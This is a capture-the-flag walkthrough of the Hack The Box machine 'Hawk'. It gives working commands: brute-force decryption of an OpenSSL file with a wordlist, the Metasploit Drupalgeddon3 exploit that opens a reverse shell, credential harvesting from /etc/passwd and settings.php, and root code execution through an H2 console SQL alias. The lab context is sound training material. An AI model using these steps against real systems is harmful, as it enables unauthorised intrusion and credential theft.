[HTB Notes] Hawk

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.102
# 21/tcp   open  ftp
# 22/tcp   open  ssh
# 80/tcp   open  http
# 5435/tcp open  sceanics
# 8082/tcp open  blackice-alerts
nmap -oN hawk -p21,22,80,5435,8082 -sC -sV -v 10.10.10.102
# 21/tcp   open  ftp           vsftpd 3.0.3
# | ftp-anon: Anonymous FTP login allowed (FTP code 230)
# |_drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
# | ftp-syst: 
# |   STAT: 
# | FTP server status:
# |      Connected to ::ffff:10.10.12.250
# |      Logged in as ftp
# |      TYPE: ASCII
# |      No session bandwidth limit
# |      Session timeout in seconds is 300
# |      Control connection is plain text
# |      Data connections will be plain text
# |      At session startup, client count was 2
# |      vsFTPd 3.0.3 - secure, fast, stable
# |_End of status
# 22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey: 
# |   2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
# |   256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
# |_  256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
# 80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
# | http-methods: 
# |_  Supported Methods: GET HEAD POST OPTIONS
# | http-robots.txt: 36 disallowed entries (15 shown)
# | /includes/ /misc/ /modules/ /profiles/ /scripts/ 
# | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
# | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
# |_/LICENSE.txt /MAINTAINERS.txt
# |_http-server-header: Apache/2.4.29 (Ubuntu)
# |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
# 5435/tcp open  tcpwrapped
# 8082/tcp open  http          H2 database http console
# |_http-favicon: Unknown favicon MD5: 8EAA69F8468C7E0D3DFEF67D5944FF4D
# | http-methods: 
# |_  Supported Methods: GET POST
# |_http-title: H2 Console

2. Begin enumeration from available ports
[x] Explore ftp service at port 21
ftp 10.10.10.102
# Name (10.10.10.102:root): anonymous
# ftp>
ls -la
# drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
cd messages
ls -la
# -rw-r--r--    1 ftp      ftp           240 Jun 16 22:21 .drupal.txt.enc
get .drupal.txt.enc
# local: .drupal.txt.enc remote: .drupal.txt.enc
# 240 bytes received in 0.00 secs
exit
[x] Check contents of .drupal.enc.txt
cat .drupal.txt.enc
# U2FsdGVkX19rWSAG1JNpLTawAmzz/ckaN1oZFZewtIM+e84km3Csja3GADUg2jJb
# CmSdwTtr/IIShvTbUd0yQxfe9OuoMxxfNIUN/YPHx+vVw/6eOD+Cc1ftaiNUEiQz
# QUf9FyxmCb2fuFoOXGphAMo+Pkc2ChXgLsj4RfgX+P7DkFa8w1ZA9Yj7kR+tyZfy
# t4M0qvmWvMhAj3fuuKCCeFoXpYBOacGvUHRGywb4YCk=
base64 --decode .drupal.txt.enc
# Salted__kY ...
base64 --decode .drupal.txt.enc > openssl_salted
#
[x] Create script (salty.sh) to decrypt openssl_salted using a wordlist
#!/bin/bash

while read key_file; do

	attempt=$(openssl aes-256-cbc -d -k $key_file -in "$2" 2>&1);

	if ! [[ $attempt == *"bad decrypt"* ]]; then
		
		echo "key: $key_file";
		echo $(openssl aes-256-cbc -d -k $key_file -in "$2" 2>/dev/null);

		break

	fi

done < "$1" 2>/dev/null
[x] Run salty.sh
./salty.sh /usr/share/wordlists/rockyou.txt openssl_salted
# key: friends
# Daniel, Following the password for the portal: PencilKeyboardScanner123 Please let us know when the portal is ready. Kind Regards, IT department
[x] Explore http service at port 80
[x] Login to the service
[x] USERNAME: admin
[x] PASSWORD: PencilKeyboardScanner123
[x] Title: Something
[x] Body: Something
[x] Check the version of the running service
[x] Drupal 7.58
[x] Search for available exploits
searchsploit drupal 7.58
# Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)
# exploits/php/webapps/44557.rb
[x] Run msfconsole
msfconsole
# msf >
search drupal
# exploit/unix/webapp/drupalgeddon3
# Description: Drupalgeddon3
use exploit/unix/webapp/drupalgeddon3
# msf exploit(unix/webapp/drupalgeddon3) >
set DRUPAL_NODE { x | http://10.10.10.102/node/x }
set DRUPAL_SESSION SESSf81a199613881208c11cbfee1f525315=<AUTHENTICATED_SESSION_COOKIE>
set RHOST 10.10.10.102
set LHOST <HTB_IPv4>
exploit
shell
[x] While inside shell:
/bin/bash -i
# www-data@hawk:/var/www/html$
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daniel:x:1002:1005::/home/daniel:/usr/bin/python3
find /var/www/html -name *settings* -exec ls -la {} \; 2>/dev/null
# -r--r--r-- 1 www-data www-data 26556 Jun 11 16:09 /var/www/html/sites/default/settings.php
# -rwxr-x--- 1 www-data www-data 26250 Jun 11 16:08 /var/www/html/sites/default/default.settings.php
cat /var/www/html/sites/default/settings.php
# 'database' => 'drupal',
# 'username' => 'drupal',
# 'password' => 'drupal4hawk',
# 'driver' => 'mysql',

3. Generate user shell (daniel)
[x] Login via SSH
ssh -l daniel 10.10.10.102
# daniel@10.10.10.102's password: drupal4hawk
[x] While inside Python shell
from os import system as sh
sh("find / -name user.txt 2> /dev/null")
# /home/daniel/user.txt
sh("cat /home/daniel/user.txt")
# d5111d4f75370ebd01cdba5b32e202a8
exit()
# Connection to 10.10.10.102 closed.

4. Attempt Privilege Escalation (daniel -> root)
[x] H2 Console
[x] Sorry, remote connections (‘webAllowOthers’) are disabled on this server.
[x] Login via SSH with port forwarding
ssh -L 4444:localhost:8082 -l daniel 10.10.10.102
# daniel@10.10.10.102's password: drupal4hawk
[x] JDBC URL: jdbc:h2:tcp://localhost/~/drupal
[*] Leave credentials as is
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

     java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); 

     return s.hasNext() ? s.next() : "";

}$$;
[x] Abuse code execution
CALL SHELLEXEC('id')
# uid=0(root) gid=0(root) groups=0(root)
CALL SHELLEXEC('find / -name root.txt')
# /root/root.txt
CALL SHELLEXEC('cat /root/root.txt')
# 54f3e840fe5564b42a8320fd2b608ba0